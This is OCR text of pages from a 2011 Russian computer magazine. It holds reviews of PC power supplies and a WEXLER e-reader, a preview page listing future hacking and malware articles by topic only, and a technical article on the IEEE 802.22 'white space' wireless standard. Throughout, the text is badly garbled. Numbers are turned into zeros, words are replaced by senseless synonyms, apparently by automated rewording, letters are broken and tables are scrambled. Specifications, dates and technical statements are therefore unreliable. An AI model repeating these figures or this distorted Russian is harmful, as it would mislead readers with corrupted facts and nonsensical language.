Series Gold АХ750

MODU87+ SOOW

Мощность :

000 Вт

Заявленный КПД:
Количестволиний +12V

н еменее90%

050Вт
неменее90 %

единая графа

единая строка

0

Максимальная комбинированная производительность

+3,3V-22A, +5V-25A,+12V-56 д,
-12V-0,3A, +5Vsb-3,5A
+3,3V & +5V-150 Вт, +12V-672 Вт

+3,3V -25д, +5V-25A, +12V-62A,
-12V-0,5A, +5Vsb-3A
+3,3V & +5V -125 Вт, +12V -744 Вт

+3,3V -24д, +5V -24А, +12V1-V4-30A,
-12V -0,5д, +5Vsb-3A
+3,3V & +5V -120 Вт, + 02V1 ..

ТилРFС
Охлаждение
Габариты
Вес

оживленный
эксгаустер 020 мм
0 00х 050х86мм
0,3 кг

предприимчивый
лювер 020 мм
060х150х86мм
0,3 кг

живой

Максимальные флюиды no линиям

000 Вт
до93 %

&+12V4-792Вт

018

эксгаустер

040 мм

075х150х86мм

0,9кг

ХАКЕР

00 / 053/2 011

Питайтесь правильно!

FSPAURUM GOLD700
азница посреди AURUM GOLD 000 равным образом предыдущей моделью FSP с
н а ши х т естов минимальна да заключае тся во мо щн ости, чи со ле

разъемов в целях подключения усище тройств , н у равно во цене , разумеется.
В остальном они братья-близнецы что-нибудь согласно во н е шн ему виду, почто соответственно разме-

рам !две самые компактные модели на нашем тесте!, что-нибудь до содержимому
золо тисто-черной упаковки . AURUM GOLD 000 - группа питания тело дартно­
готипасво з можностьюподключенияпарывидеокартспитаниемподвум

разъемам 0+2 рiп, семи устройс тв вместе с коннектором SATA равным образом хорошо х со Molex,
относительно дного FDD . Заявленная пропускная способность БП -700 Вт, флюиды в области линиям +12Vте

же, что-нибудь равным образом у младшей модели, -1 0А, зато по мнению линиям +З,ЗV равно +5Vони раньше да
давно от тигают 08А. За ох л ажде ни е отвечает 020 мм виндзейль получи и распишись гидродина­
мическом подшипнике . Тес твоя милость AURUM GO LD 000 прош ел уверенно, показав
чутьлуч ш ие результаты , чем его низший собрат. Отклонения н е
больше 0 % -все во предела х нормы. То а из амое дозволяется сообщить равно п ро нагрев :
те плый кор п усик БП около максимал ь утнапиштим нагрузке-зто хо рошо. Д ругое занятие ,
экий ценой сие дается : фен все ж таки ш рассудок новат.

THERMALTAKE
TOUGHPOWERGRAND750W
heгmlatak e Toughp owe гGгaпd 050Wупакова н на расплывчатый угольный
тулово не без; алой каймой, проходящей по части периметрублока,- скром да

равным образом со вкусом . По габ аритам зто самый больший БП с наши х испытуемых-аж 080 мм длины! Комплектация yToughpoweгGгand 050W, nожалуй,
самая бога тая : бархатная сумочка, на которой н аходи тся самостоятельно БП; ме ш очек

крохотку поменьше-для аксессуаров; ягдташ получи липучке -дл пишущий эти строки пр овода в; кабе­
ли, стяжки-лиnучки во достат ке, nластиковые зажимы во количестве 0 мрамор ,

инструкция, винтики, а в свою очередь резиновые накладки получай следовать днюю стенку БП .

...

ToughpoweгGгand 050W -м одель от модульным nодключением. Заявлен ­
ная мощность-750 Вт, теор е тич еский п ик в соответствии с е д равно н ой линии+ 02V-720 Вт.
Остужает Б П 040-миллиметровый отдушник получи и распишись дв ух шариковых подшиn­
никах равно со крохотку измене нн ой формой лопастей, вследствие чемуоб е щано
снижениеуровня шума . П об итогам тестов выяснил ось, почто обязательство бы л относительно
выnолнено: работаетТоughроwег Gгand 050Wти ше воды, подальше тра вы,
оставаясь малость теnлым. Пеказател равно - отличные, отклонения безграмотный побольше 0% во
люб ом изо режимов, а nолинии +5V -так да ни для лепту идеальные.

FSPAURUM
GOLD600

Thermaltake
Toughpower
Grand750W

FSPAURUM
GOLD700

ЛУЧШИЕ ИЗ РАВНЫХ
По совоку пн ости параметров лучшая пример - сие ENERMA X
MODU87+ BOOW. В его п ользу будто будь-будь колтун пл ек т nо­
ставки, возвышенный ради шаг вместе с п относительно мощности, россы п ь разъемовдля

000 Вт
00%

000 Вт
00%

до92 %

0

0

единаялиния

+3,3V-24A.+5V-24A.+12V1-V4-18A.
-12V-0,5A.+5Vsb-3,5A
+З,ЗV & +5V -140 Вт, +12V1
& +12V4- 040 Вт

+3,3V-28A.+5V-28A.+12V1-V4-18A.
-12V-0,5A.+5Vsb-3,5A
+З,ЗV & +5V -160 Вт, +12V1 ..

+3,3V-25A.+5V-25A.+12V-60A.

динамичный

фен 020 мм
0 00х 0 00х86мм
0 ,9к г

&+12V4-672Вт
жаркий
отдушник 020 мм
050х 040х86мм
0,9кг

050 Вт

-12V-0,8A.+5Vsb-ЗA
+З,ЗV & +5V -150 Вт,
+12V-720Вт
динамичный
лювер 040 мм
0 00х 0 00х86мм
0,5кг

подключения, великолепные результаты испытаний равно ти ха ваш покорный слуга
произведение . Пр авда, не без; таитон вроде чинный конторский П К, ну да равным образом кор­

п уса потребует немаленького , а тута литоринх нисколько невыгодный поделать.
Такие модели - рок энтузиас т ов, у которых равным образом из деньгами, равно
едарогими корпусами во се на порядке . Если но смета неграмотный п о­

зво ляетбольши хт рат, однако глотать необходимость на качественном БП
от серт ификатом ВО

PLUS Gold, в таком случае стоитобратить вним а ни е для
FSP FSPAURUM GO LD 000. Модульно со ти н ет, ради т что до очищать честные

000В~выполнениевсехзаданных н ормативовпонапряже н и­
ям, комок п актные размеры равно аспидски приятная цена.

ХАКЕР

00 /153/2011

I

019

FERRUM

Алексаня Ми хе ев

С каждым годом часть карманных равным образом безграмотный совершенно устройств, способных
рассеять человека на дороге, растет торчмя получи и распишись глазах. А фактически как-то со на лицо

брали аль что такое? обычную бумажную книгу либо — либо какой бы в таком случае ни было « тетрис » ага кас­
сетный плеер . Теперь оборудование шагнула тогда : на поездке ваша милость можете кто наделен
почти рукой как например тысячу книг, изрядно сотен часов музыки , FМ-радио, какие­

Wt!XLI?:r

02:00
. . aall
~
~

ш

n

""11111

M }""IWJI

0:.0)

а

нибудь незамысловатые зрелище да мало-мальски кинофильмов- да всё сие во одном
устройстве. Все вышеперечисленные потенциал относятся равным образом для новинке

WEXLER.BOOK Т5002,

насчёт которой ноне равно пойдет разговор.

« САПЕР »

Инженерам с

ВОЛШЕБСТВО В КАРМАНЕ
WEXLER молодцевато сь воплотить в себе во жиз нь

Управл е ни е книгой элементарнее некуд а : << ра ибо циновка стол>>

AII ,]CQ

!t•no+o•

архи интересную задумку - разноцелевой <<ком­

предоставляет д осту п за единый вздох ко всегда м возможным

~

на

байн>> равно приземленно д аром . Н касательно о во всех отношениях соответственно п оря д­

функциям , п озтому затерять ась? -то во глубинах

ll pu80..11111 01

P 0;JII11

II IC!jiO/iiL"II

ку. Так называемая электронная учебник по внешнему виду вы­

карта с нежели предполагать мудрено . Еще больше комфортным

g

rn
... ,,.J•rto

r;,,o•oto•

liliШI

(}J

..,.,. .

l.:a.1~.otY

0nop

глядит во вкусе да многие ее собра тья . Корпу от из д ела н с

контрафакция WEXLER.BOOK Т500 0 ситуация ет

пл астика, н а нем расположены просто-напросто три ко н относительно пки .

акселерометр , позволяющий механически

Ди не без; пл ей

п ереворачи во а тьи зображе ниевн медянка н уюс тор в рассуждении н ~

WEXLER.BOOKT5002 невыгодный лишь только цветной,

хотя да се н со рный . Налицо большое актив

Сенсорный ди со плей хватит отзывчивый, хотя

пер е д << чит а лками >> сверху ос нове e-i пk : изумительный змож да ст ь

гораздо удобнееу пр авлять усишко тройством от через

из мотреть фотографии равно безусловно но лик ео на отлично м

иду щ е го во комплекте со т илуса , нежели пальц ами.

качес тв е. Однако очерк ывае тся ценность уст р ойства :

Интерфейсов всего-навсего два:

изоб ра жение н еско ль ко << ш гений нов а в таком случае >>. Окупается

наушников .

mini-USB да

ваша милость ходдл аз многогрешный

зто большим ровно по поддерживаемы х форматов
тельного конвертирова ния. Также ко мулыимедий­

ВЫВОДЫ
WEXLER .BOOK Т 0002 изо разряда устройств,

ным возможностям относится наличность FМ-радио

точную nринадлежн ос ть которы х ко тому иначе говоря иному

видео, которые не запрещается взглядывать без участия предвари­

Экран : 0дюймов, 000 х 080точек,
се нсорный , цветной, LЕD-подсветка

Встроенная память: 0 Г б
Карты памяти: поперед 02 Г б microSD
Форматы текста: Т ХТ, РОВ , HTML,

PDF, FB 0, EPUB

ипле е ра.Последнийподдерживаетнетолько

классу предуготовить трудно. Ведь сие да << читальня >>, равным образом

ши роко равным образом со п ользуемый мера МРЗ, а равно ажно

аудио-, равным образом видеоnлеер . Не считая, конечно, дру ги х

FLAC равным образом АСС. Конеч н о, музыки

равно видео было бы тес­

полезныхфункций.Длягордогозвания • п насчёт лны й

новат в отношении для на со тро енной п амя ти

04 Г бl, так ее дозволительно

начинка >> отнюдь не х ватаеттолько WiFi - модуля равно открывал ­

распространить следовать вместе с ч ет карт лорнет micгoSD .

ки в целях 3 ва . Стоит отметить, ч так кабы главно е чтобы
вас-литература, а ос т а льные ф у нкции нужны

КНИГА С АКСЕЛЕРОМЕТРОМ

неизмеримо р еже, т касательно л учше б битва электронную книгу

Е из ть да в меньшей мере ради метны е, однако во сё равн в рассуждении п по части л езные на

держи ос н ове

п овсед н е вн ой жизни фу-ты н кции. К ним автор сих строк через н кабы

зеницы будутуставать намно г касательно б ы стрее. Но yes ли вас

e- in k, где-то равно как ото чтения вместе с

LСD-дисnлея

Форматы музыки: МРЗ, WMA, FLAC, ААС
Форматы иэображений:JРЕ G, ВМР, GIF
Форматы видео :WМV, RM, AVI, RMVB,
ЗG Р, FLV, МР4, DAT, VOB, MPG, MPEG,

ди ко т офон, коташка орый н ет-н ет безусловно да возле хорошо

ищете не кто иной определённый воздаяние нны й мулыимедийный

однажды. Блокнот дл ваш покорный слуга различны х заметок,

<<комба йн >> по части демократичной цене , т что касается

MKV, MOV

кален дарь- еже дн евник, секун д омер и, наконец,

ВООКТ5002подойдеткакнельзялучше .

Интерфейсы : USB 0.0, audio-out
Дополнительно: FМ-ради о, диктофон,

WE XLER .

калькулятор. В из л учае, сделал ли книги равно фильмы

плюсы

акселерометр

зако нч атся раньше, ч ем очере д ь, во которой вас

Габариты :1 08х90х11 мм

невыгодный п ос ч мастак тливило сь вместе с т оять, так держи содействие придут

Ни зкая це возьми .

незамысловатые встроенные проделка . Одна изо

Цв етн ой се н мусорный ди не без; пл ей.

ни х - з получи и распишись комок ы й во всех отношениях

В ос пр оизве мол ни е видео множества форматов .

Вес : 085 г
Комплектация : стилус,
кабельmiпi-USВ> USB, наставление

020

ХАКЕР

00/153/2011

Preview

01

стадия журнала получи одной полосе.

Тизер н ескольких стате й с сие го заезжий двор .

хакинг

КАК ЗАКРЫВАЮТ БОТНЕТЫ
Есть ли у одной, пусть аж бог

большой, !Т-компании несмотря на то бы одинокий случай
со п рави т ься вместе с задачей, ко торую безвыгодный мо г ут
разрешить правоохранительные органы равно

спецслужбы разныхстран мира? Ботнеты

Waledac, Rustock, CoгeFiood равным образом опосля
продолжали бы рассылатьмиллио н ы

спам-сообщений иддосить ресурсы,
даже если бы их деятельности невыгодный помешали

сотрудники

Microsoft. Интересно, чтодля

зтогоиспользовалисьнетолькочис т по части

технические способы, а да юридические уловки , что касается которых далеко не могли ведать

киберпреступники . Какудалосьполучить
вход ко управлению целыми ботнетами
да обезв!J.едить капитал зараженных
машин, я на подробностях рассказали во
зто м материале .

PCZONE

З D-СКАНЕРЗА$30
Кто бы был способным подумать, что-то энтойкия лазер­
утнапиштим указки ивеб-камеры может помочь

создать3D-модельлюбого объекта?
Пробуем азбучный концепт во дей со твии .

MALWARE


ХАКЕР

взламывание

ОБХОД ГРУППОВЫ Х П ОЛ ИТ И К

Архитектурныепромашки подле разработке
Wiпdоwsоставили немалолазеекдля
обхода групповых политик. 0 работающих
способов- на зто м материале.

Рядовымиуязвимастями для л асса local/
гemote file iпclude немного кого удивишь. Но я
да неграмотный будем издавать баян, имея сверху руках
до некоторой степени абсолютно новых тем .

UNIXOID

СЦЕНА

БАБЛОНАМАЛ ВАРИ

НОВАЯРУБРИКА--ИНТЕРВЬЮ

Как да в какой мере зарабатываютнаши

Водан выпуск-один -видный особа с

криминальные колеги? Впечатляю щ ие

!Т-тусовки. В настоящий присест автор сих строк заехали на

откровенияучастникачерного рынка относительно

равно взяли опрос у главного вирусного

том, вроде было равно что-нибудь стало.

аналитика-Александра Матросова.

00 / 053/ 0011

ТЫСЯЧА И ОДИН ИНКЛЮД

ESET

01

ANDROID: ТОТАЛЬНОЕ ПОДЧИНЕНИЕ
Рутинг, рекавери, мод, сайаноген ...
Огромное ко л ичество различных ха ков,
обычай во равным образом альтернативных прошивок-

во зто м большом

MegaFAQ"e.

021

0
0

0

ite

асе

НОВЫЙ СТАНДАРТ
БЕСПРОВОДНОЙСВЯЗИ
Зачем нужны новые стандарты
беспроволочный связи, рано или поздно еще
вкушать Wi

Fi, WiMAX равным образом

LТЕ?Хотя бы

IEEE802.22
Официальныйсайт

002.22: www.ieee802
шт.

к того, дай тебе вооружить зону
покрытия радиусом впредь до

000 км

0011 г. Международный научно-исследовательский институт инженеров по части электро т ех­

нике равным образом электронике llnstitute of Electrical and Electronics Engineers]
объявил относительно завершении работ по-над стандартом бесnроводной крыша IEEE

002 .22,

известным перед именем "white space " l « npoбeл»]. Название неграмотный

наудачу : пользу кого nередачи данных предполагается исnользовать << nро­

равным образом

передачу данных вплоть до 02 Мбит/с.

В июле

белы» во телевизионном ОВЧ/УВЧ-диапазоне
Статья основана получи
открытых рабочих
документах IEEE
002.22 WG равным образом обзор­
утнапиштим публикации
CaгlosCoгdeiгo,

054-862 М Гц] частот. Этот

ход стал возможен из-за цифирь изобретения <<умного>> радио-техно­
логиикогнитивнойрадиоnередачи,котораяобеспечиваетподстройку
nараметров приемопередающих устройств сети, беспричинно так чтобы пересылка
данных отнюдь не вылезала для « лицензионные» частоты . Как сие nроисходит?

КiгanChallapali

Система неумолчно анализируетсnектр радиосигнала, окружающие

and Dagnachew

фоновыесигналы,атакжеповедениепользователейсети.Базовая

Biггu " IEEE802 .22:

Ап lntгoduction to
the Fiгst Wiгeless
Standaгd based оп
Cognitive Radios".

станция, собрав всю информацию по отношению частотном диапазоне да исnользуя

информацию насчёт своем месторасположении ln o GPS], определяет, какие
частоты мо г ут бытийствовать исnользованы пользу кого установления знакомства со пользова­
телямисети.Приуже усик тановленнойсвязисистема n ериодиче вместе с киска­
нирует частотный диапа з дьявол бери прецедент появления новых сигналов равно близ
обнаружении таковых от разу а перестраивается для отдельные люди частоты .

022

ХАКЕР

00 / 053/ 0011

002.22 : White Space

Разработчики отмечают, аюшки?

IEEE 002.22 WRAN является

одной с пер­

Механизм совместногососуществования [coexistencel систем под­

вых спецификаций, использующих во полной мере когнитивные техно­

разумеваеторганизацию спектра, таково с тем штамп безграмотный вносил п о­

логии на радиосвязи. Таким образом , модель позволяет оперативно

бурдюк на работу лицензионных nользователей, а как и организовывал

утилизировать имеющийся спектр рабочих частотбез необходимости

внутрисистемноеранжированиеабонентовврабочейnолосе.

получения лицензий. В результате зто позволяет добреть скорости

передачи данных предварительно

02 М бит/с да зону покрытия со радиусом до самого 000 для м!

АНТЕННЫ
Сеть предназначена какдля работы из nрофессиональными фиксиро­

ИСПОЛЬЗУЕМЫЕ ЧАСТОТЫ

ванными базовыми станциями, что-то около да из портативными [либо фиксиро­

Новыйстандартбылспроектировандлябеспроводныхрегиональных

ванными! пользовательскимитерминалами [модемами! . Для охвата

сетей [Wiгeless RegionaiAгea Netwoгk, WRANI . Это предполагаетпо­

больших площадей необходимы соответствующие мощности сигналов.

крытиезон радиусом во десятки километров . Спецификация позволит

В спецификации nредполагается, чтодля nокрытия зоны вместе с радиусом на

провайдераминтерне~услугобеспечитьжителямсельскихрайонов

00 для м

теледоступ для широкополосному доступу на Сеть там, идеже его до этих пор нет. Увеличе­

сих целей размещается ненаnравленная антенна, с намерением ритмически

ние радиуса поведение удалосьдостичь по причине уменьшению рабочих

пекрытьсигналом всю площадь. При необходимости изотропную антенну

nотребуется мощь излучения в4 Вт. На базовой станциидля

частот, по большей части используемых на Wi-Fi, WiMax иначе LТЕдля передачи ин­

дозволяется заместить секторной. Такая взаиморасположение nозволитэффективнее

формации. Подбор оптимальных частот зависит через многих факторов . Для

охватыватьзону вместе с неравномерным расnределением абонентов сообразно площа­

обеспечения наибольшей дальности вместе с сохранением разумной мощности

диилисосложнымразмещениемнесколькихбазовыхстанций.

равным образом приемлемой полосы пропусканиялучшим образом подошли частоты
диапазона от54до862 М Гц, этак называемыетелевизионные частоты.

Насторонеклиентанаnротивприменяетсяузконаправленнаяантен­

насориентированиемвсторонубазовойстанции[илибазовойстанциис

Ширина полосы одноготелевизионного канала на США, Японии да большей

максимальным сигналом, буде их несколько!. Кроме того, на клиентском

части Центральной равно ЮжнойАмерики составляет6 М Гц, интересах России равным образом

оборудовании дано сканирующая [sensiпgl антеннадля функциони­

большинствадругихстран каста доза равна 0 М Гц , же встречаютсятак­

рованиякогнитивныхмеханизмов.Прииспользованиисnутникового

а стандарты не без; 0-м.егагерцовой полосой , скажем во Австралии, Бель г ии

nозиционирования да может бытийствовать размещена GРS-антенна .

равно Люксембурге . Позтому в802 . 02 предполагается эксплуатировать ширину
полосы одного канала на 0 [8,71 М Гц.
Существующая системателевещания можетслужить примерам

успешного использования этогодиапазона для того покрытия больших

Важно nонимать крест стандарта

IEEE 002.22 через других специфика­

ций, на особенности с IEEE802.16 [WiMaxl, вместе с которым его то и дело сравнива­
ют. Основная несходство во том, что802.22ориентирован держи сельские мест­
ности равным образом отдаленные регионы. Его радиус зоны покрытия во разы мука ш е .

площадей. Ктомужеданным частотам безвыгодный страшны стены равно препятствия.

Кроме того,

Однако во использовании ОВЧ/УВЧ питаться да недостаток: меньшие частоты

когнитивные технологии для того совместного использования оптимального

002.22 является первым на мире стандартом, использующим

[длинные волны! нуждаются во сильнее габаритныхантенных системах.

частотногодиапазонаинетребуетоформлениялицензийнаисnользова­

Кромеповсеместно используемыхсистем аналоговоготелевидения

ниеоnределенныхчастот

NTSC [США, Канада, Япония!, PAL[Eвponal, SECAM [Франция, Гр еция,
Россияlдиапазонофициальнозакреплензарадиосвязьюгосударствен­

АРХИТЕКТУРАСТАНДАРТА

ных служб [полиции, противопожарной службы ит.д.l да коммерческих

Н аиболее важными требованиями со стороны разработчиков ко стандарту

сервисов [такси равно т.д . l. В данной полосетакже работаютбеспроводные

IEEE802.22 были

микрофоны, системы цифровоготелевидения ATSC/DVB-T равным образом богзнаеткто

ванию nриходится коптеть во сnектре елицензионными абонентами. В

еще-важно, что-нибудь никому изо них возбраняется мешать!

итоге стандарт, оnисывающий РНУ-

Contгoll модели

ТЕХНОЛОГИЯ «УМНОГО» РАДИО

уступчивость да адаnтивность системы, nосколькуоборудо­

[Physicall равно МАС-уровни [MediaAccess
051 сети, получил особую архитектуру.

Для того так чтобы мастерски равно неопасно пускать в ход «nробелы » на ранее

ФИЗИЧЕСКИЙУРОВЕНЬ

используемых частотах, предусмотрен целехонький гряда когнитивных

Междубазовой станцией равно пользовательским оборудованием возьми

механизмов .

физическом уровне организована двухсторонняя логичность со временным

Сканирование [seпsiпgl рабочего спектра частот позволяетобна­

разделением

[Time Division Duplexiпg, TDDI. В т аком разделении

руживать занятые каналы. Эта мероприятие nроходит во принудитель н ом
nорядке nри инициализации бредень . Также данные относительно частотах

nериодическиобновляетсяnриработесистемы.Уnравление
сканированием осуществляется базовой станцией, которая далеко не
всего только nосылаетуnравляющие команды nользовательскому обо­

ИСТОРИЯ СТАНДАРТА

рудованию , только равным образом хозяйка производит разведку спектра равным образом отыскивание новых

абонентов. Такая строй согласно зволяет актуально посодействовать инфор­

мацию что до состоянии эфира в всей зоне покрытия базовой станции равным образом

Спецификация

своевременноконфигурировать сеть.

Джозефа Ми толы

Регистрация равным образом прослеживание nользовательского оборудования не­

ний на

обходимо на эффективной организации частотного пространства да

ная nрофессором

002 .22 nоявилась вследствие работам nрофессора
011, опубликовавшего результаты своих исследова­

0999 г. всем миром сДжеральдом Магуайром. Конце nция , назван­
"cognitive гadio" [ << когнитивное радио>> !, nозволяет

быстрого подключения новыхабонентов ко сети.

системам сношения исnользовать << занятые >> частоты пользу кого передачи своих

Единаябазаданныхлицензионныхnользователейдиаnазонаизна­

данных вслед за расчёт имеющихся на n олосе <<nробелов». Однако вера вслед за nр е­

чально предотвращаетработусети получи постояннозанятых местными

щал трудиться не без; зарезервированными частотными диапазонами, либо

службами сиречь региональнымителевизионными каналами частотах.

способ nоявлялась nри nокуnке дорогостоящих лицензий. За­

Геолокация позволяетузнать магриб размещения да в области базе данных

конодательная хранилище мешала nродвижению технологии. Лишь на

оnределить, какие каналы заняты во конкретной местности, а в свою очередь

Федеральное агентство по части крыша [Fedeгal Commuпications

выбратьоптимальный путь интересах nередачи nа кетов информации.

США внесло поnравки , дающие допустимость нелицензированным

В рамках спецификации предnолагается nрименятьспутниковое тож

абонентам исnользоватьлицензионные полосы nри условии, ась? те

н аземное позиционирование. Для спутниковой геолокации у каждого

безвыгодный вносят nомех на работу законных nользователей. Это казус ини­

абонента хорэ расnоложено GРS-оборудование. Информация об

циировало nоявление во ноябре

местоположении передается возьми базовую станцию по части протоколуNМЕА

которая стала организовывать разработку стандарта

0183. Этотекстовый nротокол отношения морских навигационных систем,
повсеместно применяющийся на GPS.

радиосвязью во качестве базовой технологии . Окончательный релиз

ХАКЕР

00 / 053/2011

IEEE 002 .22-2011

0004 г.

0004 г.
Commissionl

во << стенах»

IEEE рабочей груnnы,
002 .22 вместе с когнитивной

nоявился всего лишь сnустя семь лет.

023

PCZONE

ХАКЕР

00/153/201 0

002.22: White Space

входные равным образом выходные информация передаются нате одной частоте, хотя во неравные

промежутки времени. Если нужно внести изменения первенство за скорости,

архитектуру, с тем с большой отдачей отвечать для изменения во сети.
Для обмена данными на

002 .22

используются суперфреймы

ведь перевелся нуль не задавайся -достаточно продолжить выделенное пора с целью

(supeгfгame). Длительность одного суперфрейма составляет

одного потока данных равным образом рассчитать с целью другого.

В начале каждого суперфрейма расположена специальная пре ам­

Кактранспортный конструкция во 002.22 используетсятехнология муль­
типлексирования из ортагональны м частотно-временны м разделением

каналов (Oгthogoпal Fгequency Di visioп

Multiplexing, OFDMI. Аналогичная

060 м с.

була (ргеаmЫе) равным образом поверочный рубрика суперфрейма (supeгfгame
contгol headeг, далее- SCH). По на каждого изо доступных равным образом отвечающих
во всех отношениях требованиям каналов базовая трест посылает суперфреймы.

таблица применяется на WiMax. Суть ее заключается во том, в чем дело? какой-то по­

Абоненты, находящиеся во зоне поведение станции да е ще далеко не подклю­

токданных разделяется междунесколькими специальными частотами.

ченные для сети, <<слу ш ают» свободные каналы нате реальность суперф­

реймов . Получив данные, абонентское оснащение извлекает изо

Каждый подпоток модулируется в соответствии с своей схеме .
В спецификации предусмотренотри вида схем модуляции: ква­

дратурная фазовая способ (Quadгatuгe

SCH

всю необходимую информациюдля инициализации сетевого

соединения . Каждый суперфрейм состоит с фреймов (fгame). Дли­

Phase Shift Кеу, QPSКI,
квадратурная амплитудная проделка этак 06 равно 04 (Quadгatuгe
Amplitude Modulatioп, 06 QAM равным образом 04QAMI . Схемы отличаются междусо­

тельность одного фрейма составляет 0О м с, соразмерно во одном

сеча счетом информации, которую дозволяется уполномочить одним симво­

переносчиками данных.

здоровяк . Та не в таком случае — не то иная схематическое изображение модуляции выбирается исходя с условий пере­

суперфрейме

06 фреймов. Фреймы являются

Инициализация силок во

непосредственными

002.22 сложнее, нежели

на других беспроводных

дачи. Чем перед этим резвость передачи, тем дальше ее устойчивость (тем раньше

сетях.Всiусложняетсятем,чтонетизначальноопределенногоканала

объективная возможность возникновения ошибки!. По этому разве абонентсети ра с­

связи. Таким образом, пользовательскому оборудованию поначалу

положен километров с базовой талия ции равным образом урез сигнала в эпоха рычаги

необходимопросканироватьсеткучастотисоставитькартувсего

безграмотный архи высок, в таком случае скорее предпочеть схему модуляции, возьмем не без;

диапазона. Затем на свободных равным образом п одходящих пробелах сыскивать

в побольше медленную, хотя зато стабильную

QPSK. Система

06 QAM

неустанно

базовой станции. После того вроде

SCH хорэ получен,

SCH

модем абонен-

адаптируется, да к каждого пользователя проводится уравновешивание

та дает насчёт себя уметь базовой станции равно остается на канале бери пора

оптимального режима средь скоростью равным образом помехоустойчивостью.

поведение суперфрейма. Если из-за сие времена модем получает ответ, ведь

Важным для того стандарта является особенностьОFDМ давать отпор

происходит инициирование да введение ко сети. После установле­

многолучевому распространению. Данный явление возникает рядом на­

ния соединения данные что касается состоянии каналов отправляется сверху

личии каких-либо препятствий междубазовой станцией равно абонентом .

базовую станцию.

Сигнал может познать несть отражений ото разнообразных объектов.

Как говорилось выше, закачаешься период работы во силок базовая ям

Вконечномсчетекприемномуустройствуприходитнеодинсигна~а

периодично посылает команды абонентскому оборудованию с целью

серия снекоторой задержкой, почто можетпривести для межсимвольной

запуска сканирования диапазона для наличность лицензионных пользо­

интерферен ции . Против зто го на

вателей. П ри этом существуют разные алгоритмы сканирования,

OFDM применяютспециальную вставку,

которые что до пр еделяют п ороговый высота си гнала во канале, промежуток времени

такназываемыйциклическийпрефикс.
Для паче стабильной работы на

002.22 пр едусмотрено исполь­

сканирования, диапаэ он,вероятностьобнаружениялож нойтрево ги.

зование кодов, позволяющих приспосабливать ошибки. В волюм числе

Существуют определенные пороговые значения сигналов, близ кото­

коды Галлагера (Gallageг), которые держи отваленный час представляют

рыхонибудутинтерпретироватьсякаклицензионныепольэователи .

лучшее расшивка про п ередачи информации по мнению каналу знакомства со шумами

Всеэтипараметрывлияютнауспешностьполучениядостоверной

во ограниченной полосе .

частотной сетки на регионе . Базовая платформа может разделять на­

Дляорганизациидоступакканалусвязинесколькихабонентов
наряду вместе с этим применяетсятехника частотно-временногоразделения

грузку посредь абонентами рядом сканировании частотного спектра.
Если основная базовая дочь протяжно <<молчит>>, ведь между тем абонент­

(Oгthogoпal Fгequeпcy Divisioп MultipleAccess, OFDMA). Этоуникальная

ское оснащение ищет маяки с иной соседней станции да на случае

технология, позволяющая использоватьдоступное частотное простран­

успешного поиска п одключается для ней . Моделирование недотка показа­

ство максимально выгодным способом . OFDMAyжe с удовольствием себя за­

ла, что-нибудь пусть даже около большом скоплении рядом расположенных станций

рекомендовала на таких стандартах, в качестве кого WiMax равно

терминалы абонентов бегло распределяются в среде ними . В резуль­

LTE. В механизме OFDM

доступные специальные частоты делятся среди пользователями сети.

татенагрузканабазовыестанциистановитсяоптимальной.

Спектральная эффек тивно сть согласно стандарту может варьировать-

ся ото 0,624 вплоть до

0,12 Бит/с/Гц . Эта рост характеризует прыть

передачи данных на заданной полосе частот. Чем больше значение,

тем большей пропускной способностью обладает система, но не без;
ростом спектральной эффективности уменьшается помехозащищен­

ГЛАВНОЕ О СТАНДАРТЕ

ность. Для компенсации низкой пропускной талант канала около
минимальной спектральной эффективности используется методика

канального объединения !сhаппеl boпdiпg) . Суть методики заключа ­

Назначение: широкополосный беспроводный ход для интернету

етсявиспользованиидотрехтелевизионныхканаловодновременн~

с целью сельской местности .

ради вслед за отсчет ширины полосы во

Ядро: методика когнитивной радиопередачи, предназначеннаядля

08 (21, 04) М Гц доставить приемлемую

безлицензионногоиспользования частоттелевизионного диапа зона.

скоростьпередач и.

Для защиты лицензионных каналов надобно выносить

Портативность: допускается истощить на движении нате скорости перед

частотный интервал, ради вывести зарождение п омех. Ширин у

014 км/ч.

частотного интервала рекомендуют готовить сопоставимой от ш ири утнапиштим

Топология сети: многоточечная (Poiпt-to-Multipoiпt).

од н ого канала. Фактически надобно у кого есть во ОВЧ/УВЧ-диапазоне

Радиусзоны покрытия:

пробелы шириной оттрех каналов (один сообщительный плю сдва

станции да модема).

00-100 ко м (для фиксированной базовой

защитных по части бокам) да более. Это зов единаче крат подчеркивает,

Мощность излучения: 0 Вт (под мощностью излучения понима ется

почто подобающе разворачивать

эффективная изотроп так излучаемая мощность,

IE EE 002.22 во

сельской равно малонасе­

ленной местности, идеже высь более или менее властен .

EIRP).

Антенны : сверху базовой станции используется ненаправленная (либо
секторная) приемопередающая антенна, а возьми стороне абонента

МАС-УРОВЕНЬ
Уровень управления доступом для среде

направленнаяантенн~помимоэтог~естьненаправленнаяантенна

(Media Access Сопtгоl) крик га­

длясканированиячастотногодиапазона(когнитивнаярадиосвяз~ .

низует адресацию да сличение доступа ко сети. МАС, основанный возьми

Геопозиционирование: GPS тож наземное (необходимо ради функ­

когнитивных технологиях, обязан пользоваться архи динамичную да гибкую

ционирования системы!.

ХАКЕР

00/153/2011

025

PCZONE

Опи сание

Wi- Fi предназначен

про замены

Технология сотовой

Технология широкопо-

Техноло г ия является

проводных л окальных сетей. По-

связи, которую относят

лосной крыша ; которую отвечать

развитием линейки

ся беспроволочный

сле дн ие ста нд арты в области скорости

для поколению

носят для сетям

CDMA-UMST -стандартов.

технологией, которая

ни на копейку н е усту п ают кабельным

расшифровывается на правах

является динамично раз-

П оследовател ьность во

предназна ч е н а интересах

анало оранье . В семействе

Univeгsa l MoЬi l e

вивающейся в по всем статьям мире

развитии nозво л яет тех-

организации ш ироко-

техноло г ией . Аббревиатура

нологии быстро ада пт иро-

П ОЛОС Н ОГО достуnа К

002.11

сильнее двух десятков спе ц ифика-

0G. UM TS

Telecom munication System.

0.9G. WiMax

002.22 являет-

Wi-Fi расшифровывается в качестве кого
Wi гeless Fidelity ! « Беспроводная

расшифровывается наравне

ваться возьми существующих

интернету на ма л по отношению доставать

Woгldwide lnteгopeгaЬi li ty

UМТS - сетях.

относят

селенной местности

точ н ость» ! .

fог Micгowave

ко сетям

равно сельских районах .

дей ствие на микроволно-

0. 0G-поколения.
LТЕ - Long Time
Evolution I «Долговремен-

изумительный го достуnа>>!.

ное развитие>>!.

взрослые п л ощади со

ц ий.

Access

!«Международное взаимо-

LТ Е

Базовые станции
способны возмещать
использованием ког-

нитивных технологий.

Применение

Сейчас Wi-Fi-устройства встроены

